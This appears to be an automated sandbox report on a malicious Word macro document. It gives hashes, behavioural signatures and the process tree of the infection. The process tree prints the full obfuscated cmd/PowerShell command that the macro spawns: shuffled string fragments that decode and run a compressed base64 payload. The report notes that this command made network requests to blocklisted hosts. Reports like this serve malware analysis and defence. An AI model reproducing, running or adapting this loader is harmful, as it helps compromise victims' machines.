Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 23:32

General

  • Target

    7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc

  • Size

    80KB

  • MD5

    7ec769008580eb7db187b9a46643629a

  • SHA1

    2d6be3a810c9797d1943551cf17b8d3e5d21e053

  • SHA256

    01e850c472afd03b8855f4b8a44715df7fd402284a620e89056ace9ccaf89317

  • SHA512

    acd61402470a948837f91596f1db1ab74213c2e8d114244b1008d6ec3fd11f578a4b04c5cc65beff404f70c7000c4e8e774305334b3f67c6f024e429d8690ca0

  • SSDEEP

    768:gI6NVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9FVorXUomQwEHcwRZ:gFNocn1kp59gxBK85fBt+a9OXUDd

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ec769008580eb7db187b9a46643629a_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3032
      • C:\Windows\SysWOW64\CMD.exe
        CMD C:\windowS\sYsTeM32\cmd /C "SEt dlV=(("{93}{86}{31}{95}{45}{77}{35}{43}{58}{30}{28}{74}{68}{42}{26}{70}{57}{23}{78}{34}{32}{17}{129}{52}{116}{71}{73}{16}{99}{127}{115}{6}{137}{134}{108}{83}{88}{106}{90}{19}{29}{96}{66}{110}{11}{51}{38}{25}{10}{107}{111}{56}{105}{67}{97}{109}{113}{33}{128}{130}{69}{133}{55}{48}{91}{72}{102}{101}{104}{112}{61}{9}{49}{124}{89}{39}{123}{46}{15}{76}{18}{44}{121}{20}{3}{79}{75}{8}{7}{92}{126}{117}{22}{120}{119}{135}{84}{87}{50}{65}{82}{53}{81}{136}{54}{37}{122}{132}{41}{2}{27}{14}{60}{24}{62}{114}{100}{59}{85}{131}{63}{0}{21}{13}{103}{118}{98}{5}{64}{94}{36}{47}{125}{40}{12}{4}{80}{1}" -f'D()3rZ',')','b','JK','N6qs','NVe','vPyv','6','g5Ko','PSF','HaCX','OY','s-JoI','( ','E','n7c','ON','Si8C','ZL','ZQvjca','wlQUtncGsi',' .','s','NG(','t','vB','mbaSE64','j','MoRY','L','iO.mE','ompre','wFIb/','/9','Bda8I','rEA','FEREnce','rZF','1jUatjsw7Pp','e','x6q','w-O','veRt]::fRo','M(','3','EFLa','l7Q/11I/A',')[','nyhD','f5','resS','gzz7eIW1LZ','DDYHhoL7','reSsiOnMODe','OmpReSs)3','k','eW2S+','TRI',' [','nCodinG]::AS','c','qd8yBV',' sYSTeM.io.streaM','aDtoeN','rbOsEpR','iO','YMp5ZyWCitO','cqQvd','M][coN','m9AF','s','FMuZABrtJ','NB9m','0y','StREA','Ro8R','ME2Tl','tESt','6qsNZ','rxtR','6qs',']::DE','n.COMP','yDwm','o.','Cii','O.C','cOmP','QN','ibTL','L','49Pl','ssw/AM=6qs',' ( nEw-ObjEct i','E','sSIoN.d','Apiep/TGrGdcx5C','1CZnu20Geu6','BU','qUmJp41T','AdER( BUN_,[Text.e','HQTu','WfE7D9HO','([S','k','4+fT+u1zdWcHd1Qu9NGP','y','yr','UbiFkrt','Sjd','BlZ6HNlP','R','vnY58ShmcgI','d3XkmFdMV','rE','4dz','QOi',',[sy','TRiNG]','em.','t','cA185CM','orE','m','32','1,3]+6qs',')','+t+Xit','4s','sbgm','VzvKNm0s',')} ).Re','ACh { nE','TQUpg','Xn9','I','C','JxD')).rePlace('BUN',[sTRing][cHAr]36).rePlace(([cHAr]54+[cHAr]113+[cHAr]115),[sTRing][cHAr]39).rePlace(([cHAr]51+[cHAr]114+[cHAr]90),[sTRing][cHAr]124)^| . 
( $PSHOME[4]+$pshOme[30]+'x')&& POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          POWerSHelL ${eXECUTIONCoNtEXT}.\"iNvo`k`eCOmM`AND\".( \"{1}{2}{0}\" -f'IpT','InV','OKeSCR').Invoke( (.( 'LS') ( \"{0}{1}\" -f 'eNV:','DLV' ) ).\"vA`lUe\" )
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2880

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      f40a71bb3e3507c5351630c4ae1530f6

      SHA1

      3750d42d8c54f616acc19f93b356c4609dab8772

      SHA256

      0f5efdf928fce117daf8abf7b6230eccadd60c87fde0c3b36ad1c508918a0110

      SHA512

      c9920ac756deba6242c1ddce51865edc4e46bcfc6a575b1b121221592e37e8d5345ebd955a6cd6e99c99084d8bd9cd6f5f7fbbcb164c0f17d993fe16740bac41

    • memory/1724-12-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-8-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-7-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-11-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-10-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-0-0x000000002FC21000-0x000000002FC22000-memory.dmp

      Filesize

      4KB

    • memory/1724-9-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-2-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1724-6-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-20-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB

    • memory/1724-21-0x00000000005E0000-0x00000000006E0000-memory.dmp

      Filesize

      1024KB

    • memory/1724-36-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-37-0x000000007150D000-0x0000000071518000-memory.dmp

      Filesize

      44KB